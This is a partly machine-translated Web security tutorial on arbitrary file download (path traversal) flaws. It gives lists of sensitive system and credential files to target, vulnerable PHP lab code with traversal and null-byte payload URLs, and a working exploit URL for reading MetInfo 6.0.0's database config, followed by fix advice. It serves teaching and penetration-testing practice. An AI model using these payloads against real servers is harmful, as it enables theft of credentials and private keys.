This paper consists of members of the security red: Write Once, if inappropriate, but also look treatise.
Hello everyone, we are red safety security -Web *** group . This project is a series of articles about Web security share, HTB also contains a shooting range for your practice, we give this project has a name called Web security real , hope to help friends who want to learn Web security. Each article is based on the vulnerability Introduction - Principle vulnerability - vulnerability harm - test method (manual testing, test tools) - Test Range (range into PHP, JAVA range, Python range covers all basically three kinds of range) - Real walkthrough (mainly select the appropriate CMS or Vulnhub practical exercise), if you please help Star encourages us to create a better article. If you would like to join us, perfect together this project, please contact us by e-mail ([email protected]).
1.1 Arbitrary File Download Vulnerability read the Introduction
As business needs some sites may provide documents to view or download. If not limit the user to view or download a file, a malicious user can view or download any file, can be the source code files, sensitive files.
1.2 Arbitrary File Download Vulnerability read harm
*** can read the download server configuration files, and other sensitive documents, will provide *** More information available, raising the risk of being ***.
1.3 download any file read exploit conditions
There is a function to read the file
Reading a file path to the user and not controlled or checksum lax
The output file contents
Download any file read test vulnerability
## 2.1 Test ideasLooking for Function Point to read or download the file, directory access to sensitive files jump
Some directories limit is not strict, only part of the directory restrictions, you can try other sensitive file path, common path sensitive documents as follows:
Windows: C: \ boot.ini // Check system version C: \ Windows \ System32 \ inetsrv \ MetaBase.xml // IIS configuration file C: \ Windows \ repair \ sam // storage system is first installed password C: \ Program Files \ mysql \ my.ini // Mysql configuration C:\Program Files\mysql\data\mysql\user.MYD //Mysql root C: \ Windows \ php.ini // php configuration information C: \ Windows \ my.ini // Mysql configuration information ... Linux: /root/.ssh/authorized_keys /root/.ssh/id_rsa /root/.ssh/id_ras.keystore /root/.ssh/known_hosts /etc/passwd /etc/shadow /etc/my.cnf /etc/httpd/conf/httpd.conf /root/.bash_history /root/.mysql_history / Proc / self / fd / fd [0-9] * (file identifier) /proc/mounts /porc/config.gz
2.2 drone test
Here we use the web for pentester test
2.2.1 Installation Steps
Download: https://download.vulnhub.com/pentesterlab/web_for_pentester_i386.iso
we only need to install the VMware image file you can use
the New Virtual Machine default Next select the image file to set the virtual machine name and storage location of the disk size defaults to open this virtual machine to view the ip address to build success, where do presentations with Directory traversal
2.2.2 Example 1
The code limitation is not seen directly read the file
$UploadDir = '/var/www/files/';
if (!(isset($_GET['file'])))
die();
$file = $_GET['file'];
$path = $UploadDir . $file;
if (!is_file($path))
die();
header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
header('Cache-Control: public');
header('Content-Disposition: inline; filename="' . basename($path) . '";');
header('Content-Transfer-Encoding: binary');
header('Content-Length: ' . filesize($path));
$handle = fopen($path, 'rb');
do {
$data = fread($handle, 8192);
if (strlen($data) == 0) {
break;
}
echo($data);
} while (true);
fclose($handle);
exit();
使用../来跳跃目录读取敏感文件,我们这里读取passwd文件
http://192.168.163.141/dirtrav/example1.php?file=../../../etc/passwd
2.2.3 Example 2
从代码里可以看出,路径必须存在/var/www/files/
if (!(isset($_GET['file'])))
die();
$file = $_GET['file'];
if (!(strstr($file,"/var/www/files/")))
die();
if (!is_file($file))
die();
header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
header('Cache-Control: public');
header('Content-Disposition: inline; filename="' . basename($file) . '";');
header('Content-Transfer-Encoding: binary');
header('Content-Length: ' . filesize($file));
$handle = fopen($file, 'rb');
do {
$data = fread($handle, 8192);
if (strlen($data) == 0) {
break;
}
echo($data);
} while (true);
fclose($handle);
exit();
http://192.168.163.141/dirtrav/example2.php?file=/var/www/files/../../../etc/passwd
2.2.4 Example 3
从代码可以看出过滤空字符及以后的字符。
$UploadDir = '/var/www/files/';
if (!(isset($_GET['file'])))
die();
$file = $_GET['file'];
$path = $UploadDir . $file.".png";
// Simulate null-byte issue that used to be in filesystem related functions in PHP
$path = preg_replace('/\x00.*/',"",$path);
if (!is_file($path))
die();
header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
header('Cache-Control: public');
header('Content-Disposition: inline; filename="' . basename($path) . '";');
header('Content-Transfer-Encoding: binary');
header('Content-Length: ' . filesize($path));
$handle = fopen($path, 'rb');
do {
$data = fread($handle, 8192);
if (strlen($data) == 0) {
break;
}
echo($data);
} while (true);
fclose($handle);
exit();
http://192.168.163.141/dirtrav/example3.php?file=../../../etc/passwd%00
2.3 CMS实战演练
这里选的是MetInfo cms进行任意文件读取漏洞演示
2.3.1 安装步骤
下载地址:https://www.metinfo.cn/upload/file/MetInfo6.0.0.zip
漏洞环境:phpstudy、windows
存在漏洞:任意文件读取
解压好后,下一步下一步的安装,配置数据库、管理员信息。
安装完成
2.3.2 利用过程
漏洞点在:MetInfo6.0.0/include/thumb.php?dir=
漏洞代码文件位置:MetInfo6.0.0\app\system\include\module\old_thumb.class.php
有两次过滤,第一次把路径中../、./进行过滤,第二次路径中需要有http和不能存在./,
$dir = str_replace(array('../','./'), '', $_GET['dir']);
if(substr(str_replace($_M['url']['site'], '', $dir),0,4) == 'http' && strpos($dir, './') === false){
header("Content-type: image/jpeg");
ob_start();
readfile($dir);
ob_flush();
flush();
die;
}
在windows环境下可以使用..\进行绕过
http://127.0.0.1/MetInfo6.0.0/include/thumb.php?dir=http\..\..\config\config_db.php
漏洞修复方案
1、对./、../、、..\%进行过滤
2、严格控制可读取或下载的文件路径
参考文章
https://www.jianshu.com/p/f4b06f59c4cb
https://www.freebuf.com/vuls/181698.html
